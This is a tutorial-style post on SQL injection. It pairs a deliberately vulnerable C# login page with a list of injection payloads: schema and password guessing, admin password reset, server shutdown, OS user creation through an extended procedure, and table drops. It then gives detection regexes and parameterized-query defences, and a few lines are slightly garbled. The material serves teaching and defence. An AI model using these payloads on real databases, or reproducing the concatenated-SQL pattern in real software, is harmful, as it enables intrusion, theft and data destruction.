Attack method learning (2)

Source: Internet
Author: User
Tags: how to prevent sql injection

Introduction

Some websites build SQL statements by splicing user input directly into the query text, and then show the raw error information to users. This gives mischievous visitors the opportunity to type strange query strings that get spliced into the SQL statement and injected. Not only can important information be read out of the database; if permissions are not restricted, whole tables can be deleted. The SQL injection vulnerability is therefore quite serious. I noticed that when I was first learning to write websites, I also lived on spliced SQL statements ......

Example

To learn and understand the SQL injection method better, we made an example web page with the following interface:

The login code for this page is shown below. Note the line that builds sqlCmd: it concatenates the user's input straight into the SQL statement:

using System;
using System.Data;

private void Login()
{
    string uname = tbName.Text;
    string pwd = tbPassword.Text;
    // Vulnerable: the user-supplied name is concatenated straight into the SQL text
    string sqlCmd = "select * from [Users] where UserName = '" + uname + "'";
    // Masked copy shown on the page so the real table and column names are not displayed
    string sqlCmdRep = sqlCmd.Replace("Users", "XXX").Replace("UserName", "XXX");
    lbSQL.Text = sqlCmdRep;
    try
    {
        DataTable dt = DataSQLServer.GetDataTable(sqlCmd);
        // Every row the query returns is bound to the grid and shown to the visitor
        gvResult.DataSource = dt;
        gvResult.DataBind();
        if (dt.Rows.Count == 1 && pwd == dt.Rows[0]["Password"].ToString())
        {
            lbRes.Text = dt.Rows[0]["UserName"] + " Login Success!";
        }
        else if (dt.Rows.Count == 0)
        {
            lbRes.Text = uname + " not exist!";
        }
        else
        {
            lbRes.Text = "Login Fail!";
        }
    }
    catch (Exception ex)
    {
        // Also part of the problem: the raw database error message is shown to the user
        lbRes.Text = "Error: " + ex.Message;
    }
}


The injection steps are not described in depth here; you are welcome to download the sample program and practise on it. Clicking "Injection Guide" on the interface shows the following instructions:

1. Test whether injection is possible.

XXX
3. Guess the table name
Admin 'or 0> (select count (*) from [XXX]) --
The table name can also be obtained this way:
Admin 'and (Select Top 1 name from sysobjects where xtype = 'U')> 0 --
4. Guess the column name
Admin 'and 0 <(select count (XXX) from [Users]) --
The column name can be obtained this way:
Admin 'and (Select top 1 col_name (object_id ('users'), 3) from [Users])> 0 --
5. Guess the password length
Admin 'and 1 = (select count (*) from [Users] where len (Password) <XXX )--
6. Guess the password
Admin 'and 1 = (select count (*) from [Users] where left (Password, 2) = 'xx ')--
----------------------------------------------------------------------------------------------
Once the table and column names are known, the admin password can be changed directly, or worse damage done:
Admin '; update [Users] set Password = '000000' where UserName = 'admin '--
----------------------------------------------------------------------------------------------
Other bad behaviour:
1. Shut down the SQL service outright
Admin '; shutdown --
2. If the site connects as sa, an operating-system user can even be added to the machine and put into a group:
Admin '; exec master .. xp_mongoshell "net user name password/add "--
Admin '; exec master .. xp_mongoshell "net localgroup name administrators/add "--
3. Back up the database to disk and download it. This is very bad; please do not do it to me.
Admin '; backup database Test to disk = 'd: "1. db '--
4. Drop the table outright. Use with caution.
Admin '; drop table abc --
----------------------------------------------------------------------------------------------
Other tips:
1. Bypassing single-quote filtering
Where xtype = 'U' ==> where xtype = char (85)
Where name = 'user' ==> where name = nchar (29992) + nchar (25143)
2. Obtaining the database name
Admin 'and db_name ()> 0 --
----------------------------------------------------------------------------------------------

The following describes how to securely assemble SQL statements.

Download the sample program: SQLInjection.rar


Probe
  1. The simplest check is to enter a single quotation mark (') and see whether the page throws an error. If it does, and the error information is shown to you, the site is an easy target.
  2. Identify the database from the error information, for example Access or SQL Server; SQL syntax differs somewhat between databases.
  3. Static code analysis: check in the code whether SQL statements are assembled from strings.
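The probe described above leaves a trace on the server side: a request parameter containing a stray quote, a -- comment or a catalogue name, often followed by a 5xx response. The following is an added example (not part of the original post or its sample program) that scans constructed access-log lines for those markers, taken from the page's own probe and guide, and reports the parameter and HTTP status for each hit. The log format, IP addresses, URL and parameter names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined-log style): a normal login, then the
# single-quote probe, then a sysobjects guess from the page's guide.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login.aspx?user=admin HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /login.aspx?user=admin%27 HTTP/1.1" 500 1024',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /login.aspx?user=admin%27+and+(select+top+1+name+from+sysobjects+where+xtype%3D%27U%27)%3E0+-- HTTP/1.1" 500 1024',
]

# Markers taken from the page's own probe and guide: a stray quote, the -- comment,
# a stacked statement after ';', catalogue lookups and extended procedures.
MARKERS = [
    ("single_quote", re.compile(r"'")),
    ("sql_comment", re.compile(r"--")),
    ("stacked_statement", re.compile(r";\s*(select|update|drop|shutdown|exec|backup)\b", re.I)),
    ("catalog_probe", re.compile(r"\b(sysobjects|col_name|db_name)\b", re.I)),
    ("extended_proc", re.compile(r"\bxp_\w+", re.I)),
]

# Request line and status code of a combined-log entry (assumed log format).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_params(url):
    """Decode the query string and report which markers each parameter value hits."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = sorted(label for label, rx in MARKERS if rx.search(value))
        if hits:
            findings.append((name, hits))
    return findings


def scan_log(lines):
    """Return (line index, HTTP status, findings) for every line whose parameters
    look like an injection probe. A 5xx status beside a probe is the page's
    'the page has an error' signal: the database error path is reachable from
    user input and should be investigated."""
    results = []
    for i, line in enumerate(lines):
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = scan_params(m.group("url"))
        if findings:
            results.append((i, int(m.group("status")), findings))
    return results


if __name__ == "__main__":
    for idx, status, findings in scan_log(SAMPLE_LOG):
        print(f"line {idx}: status {status}, suspicious params {findings}")
```

The markers are deliberately narrow (they mirror only what this page shows), so a real deployment would pair them with the static code check in item 3 rather than rely on log matching alone; URL-decoding before matching is what keeps the %27 form of the quote from slipping past.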

Implementation Method

For details, see the sample Website.

Hazards
  1. Remote control: what do you do when the server is taken over remotely?
  2. Theft: confidential information in the database is stolen for personal gain or other reasons.
  3. Destruction: the database is destroyed outright.
  4. Tampering: data is modified, for example a university grade looked up and changed through the score query page.
  5. I have never done any of these.

Prevention

The sample program also shows how to prevent SQL injection. Here we distil the four magic weapons against SQL injection:

  1. Principle of least privilege
    • In particular, do not use the dbo or sa account; create separate accounts for different kinds of operations. The least-privilege principle applies to every security-related scenario.
  2. Filter user input on the server
    • Escape or filter special characters such as single quotes, double quotes, semicolons, commas, colons and concatenation operators. Use strong data types: if an integer is expected, convert the user's input to an integer. Limit the length of user input, and so on. These checks must run on the server; anything submitted by the client is untrusted.
  3. Build SQL statements safely
    • Never splice SQL statements together with strings from an untrusted source. Use parameter objects, for example in C#:
    string sqlText = "select * from [Users] where UserName = @Name";
    SqlParameter nameParm = new SqlParameter("@Name", uname);
    sqlCmd.CommandText = sqlText;
    sqlCmd.Parameters.Add(nameParm);
  4. Do not expose error messages to users
    • When a SQL error occurs, do not show the user the full error information returned by the database; it often reveals details of the database design.

  5. Note: many people may have told you that using stored procedures protects against SQL injection. This is wrong! It only prevents certain types of attack. For example, suppose the stored procedure sp_GetName exists and is called like this:
  • string name = ...; // name from user
    SqlConnection conn = new SqlConnection(...);
    conn.Open();
    // Still vulnerable: the name is concatenated into the exec statement
    string sqlString = @"exec sp_GetName '" + name + "'";
    SqlCommand cmd = new SqlCommand(sqlString, conn);
    • We try entering "Black 'or 1 = 1 --", and the following is a legal statement:
    Exec sp_GetName 'black' insert into Users values (2008, 'green ')--'
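To make items 2 to 4 concrete, the following is an added example (not code from the original post or its sample program) that reproduces the page's login logic twice: once with the spliced query from the Example section, and once validated, parameter-bound and with database errors hidden. It uses an in-memory sqlite3 table with two constructed rows as a stand-in for the page's SQL Server [Users] table, and the username policy in USERNAME_RE is an assumption, not something the page specifies.

```python
import re
import sqlite3

# Assumed username policy for the server-side filter (not stated on the page).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def make_db():
    """Constructed stand-in for the page's [Users] table: sqlite3 in memory instead
    of SQL Server, with two made-up rows, so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret"), ("green", "pass")])
    return conn


def classify(rows, pwd):
    """The page's login decision, kept as written (plaintext password compare)."""
    if len(rows) == 1 and pwd == rows[0][1]:
        return "Login Success!"
    if len(rows) == 0:
        return "not exist!"
    return "Login Fail!"


def login_concat(conn, uname, pwd):
    """Vulnerable form from the page: user input spliced into the SQL text.
    Returns (message, rows); the rows are what the page binds to its grid."""
    sql = "select UserName, Password from Users where UserName = '" + uname + "'"
    rows = conn.execute(sql).fetchall()
    return classify(rows, pwd), rows


def validate_username(uname):
    """Prevention item 2: strong type, restricted character set, length limit."""
    return isinstance(uname, str) and USERNAME_RE.fullmatch(uname) is not None


def find_user_param(conn, uname):
    """Prevention item 3: the value travels as a bound parameter, never as SQL."""
    return conn.execute(
        "select UserName, Password from Users where UserName = ?", (uname,)
    ).fetchall()


def login_param(conn, uname, pwd):
    """Hardened login: validate (item 2), bind (item 3), hide DB errors (item 4)."""
    if not validate_username(uname):
        return "Login Fail!", []
    try:
        rows = find_user_param(conn, uname)
    except sqlite3.Error:
        # Generic message only; the driver's error text never reaches the user.
        return "Login Fail!", []
    return classify(rows, pwd), rows


if __name__ == "__main__":
    db = make_db()
    probe = "' or 1=1 --"   # the tautology probe from the page's guide
    print("concat:", login_concat(db, probe, ""))  # every row lands in the grid
    print("param :", login_param(db, probe, ""))   # rejected, nothing returned
    print("param :", login_param(db, "admin", "s3cret"))
```

With the spliced query, the probe turns the WHERE clause into a tautology: the login message is "Login Fail!" because two rows came back, but those two rows, passwords included, are exactly what the page binds to its result grid. With the parameter bound, the same string is compared as a literal username and matches nothing, and the validator on top rejects it before any SQL runs at all.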

References
  1. Michael Howard, David LeBlanc. "Writing Secure Code"
  2. Mike Andrews, James A. Whittaker. "How to Break Web Software"
  3. http://www.secnumen.com/technology/anquanwenzhai.htm
